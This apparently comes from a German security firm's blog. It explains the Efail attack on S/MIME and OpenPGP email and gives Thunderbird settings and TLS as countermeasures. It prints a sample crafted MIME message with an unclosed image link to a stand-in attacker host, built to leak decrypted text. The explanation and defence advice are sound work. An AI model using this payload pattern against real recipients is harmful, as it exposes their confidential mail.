Efail Logo

Efail - die Verschlüsselung lebt noch

Deutsche und niederländische Sicherheitsforscher haben gestern vor einer neuen Schwachstelle namens Efail gewarnt. Durch sie werden angeblich die für E-Mails genutzten Verschlüsselungstechnologien S/MIME und OpenPGP gebrochen. Solche Methoden, die Ende-zu-Ende-Verschlüsselung möglich machen, sind gerade für Journalisten, Aktivisiten oder Whisteblower wichtig. Neben der Vertraulichkeit und Authentizität der Nachricht muss auch ihre Integrität geschützt werden. Und genau beim letzten Schutzziel setzen die Sicherheitsforscher an.

Der Efail-Angriff

Durch Efail werden zwei Angriffswege beschrieben, mit denen sich Informationen aus E-Mails ausleiten lassen: die direkte Ausleitung und die Ausleitung über einen CBC/CFB Gadget Angriff. Bei beiden Wegen muss ein Angreifer eine verschlüsselte Nachricht manipulieren können, bevor sie vom Empfänger geöffnet wird, der den privaten Schlüssel zur Entschlüsselung besitzt. Der Angreifer versucht in die E-Mailnachricht ein externes Objekt, beispielsweise ein Bild, am Anfang einzubinden.

Beispiel für die Einbindung eines Bilds von einem fremden Server
<img src="https://evilpage.de/bild.jpg">

Solche Objekte rufen eine Adresse auf und laden Daten von einem entfernten Server herunter. Bei dem Angriff wird das schließende Anführungszeichen der Adresse jedoch erst nach dem Ende des verschlüsselten Teils der Nachricht gesetzt, wodurch der verschlüsselte Teil der Nachricht innerhalb der Adresse des externen Bilds steht.

Beispiel für die direkte Ausleitung von Informationen
--BOUNDARY
Content-Type: text/html

<img src="https://evilpage.de/bild.jpg
--BOUNDARY
Content-Transfer-Encoding: 7bit
Content-Type: application/pgp-encrypted

PDYrCxjq78SXY8WBQ95oBBwC0KTTYmSCxHKJiLFOI89fPL6bncIpO…

--BOUNDARY
Content-Type: text/html
">
<img src="https://evilpage.de/bild.jpg
Geheime Information
">

Öffnet der E-Mail-Empfänger die Nachricht, wird zunächst der verschlüsselte Teil entschlüsselt. Dieser steht nun vollständig entschlüsselt im Adressteil des Bilds, welches gegebenenfalls geladen wird. Damit würde die Adresse mit dem gesamten, geheimen Nachrichteninhalt aufgerufen und dadurch an den Server des Angreifers geschickt werden.

Schutzmöglichkeiten

  1. Wer keine externen Inhalte nachlädt, überträgt auch keine Daten an fremde Server. Diese Einstellung sollte ohnehin bereits aktiviert sein, um die eigene Privatsphäre vor Öffnungstracking zu schützen. Allerdings wird bei dieser Einstellung der Inhalt der Nachricht nicht richtig oder nur unvollständig dargestellt. Bei Thunderbird kann das Nachladen externer Inhalte über Einstellungen - Datenschutz - Externe Inhalte in Nachrichten erlauben verboten werden.
  2. Die Forscher haben auch einige Schwachstellen in E-Mail-Clients gefunden, die trotz der Blockierung des Nachladens externer Inhalten, eine Ausleitung von Informationen an einen Angreifer erlauben. Daher sollte zusätzlich HTML-Rendering deaktiviert werden, bis Hersteller von E-Mail-Clients eine Lösung erarbeitet haben. Bei Thunderbird erfolgt diese Einstellung über Ansicht - Nachrichteninhalt - Reiner Text.
  3. Um die Manipulation der Nachricht auf dem Transportweg zu erschweren, sollte darauf geachtet werden eine TLS-Kommunikationsverschlüsselung bei der Übertragung zu verwenden. IT-Sicherheitsverantwortliche und Administratoren sollten hierauf beim Betrieb der E-Mail-Infrastruktur besonderen Wert legen.

Fazit

Die Ankündigung von Efail war fast filmreif. Einige vermuteten beim ersten Tweet schon einen schwerwiegenden Fehler im Verfahren von OpenPGP oder S/MIME, durch den Remote Code Executions auf den Rechnern der Empfänger möglich werden oder an den Grundpfeilern der Verschlüsselung gerüttelt würde. Glücklicherweise hat sich gezeigt, dass Efail zwar ein ernst zu nehmender Versuch ist, um an verschlüsselte Daten zu gelangen. Andererseits stellt Efail einen komplexen Angriff dar, und es mag einfachere Wege geben, um an sensitive Informationen zu gelangen.

Außerdem entsteht der Eindruck, die E-Mail-Verschlüsselung sei unsicher. Wer bisher seine sensitiven Nachrichten nicht verschlüsselt, der wird ohnehin von ganz anderen Gefahren bedroht. Verschlüsselte E-Mail-Kommunikation kann im Rahmen eines üblichen Bedrohungsmodells sicher eingesetzt werden und sollte bei Unternehmen und staatlichen Stellen mehr Verwendung finden. Wer Unterstützung bei der Einrichtung benötigt, findet qualifizierte Hilfe bei unseren Experten.

Fügen Sie den ersten Kommentar hinzu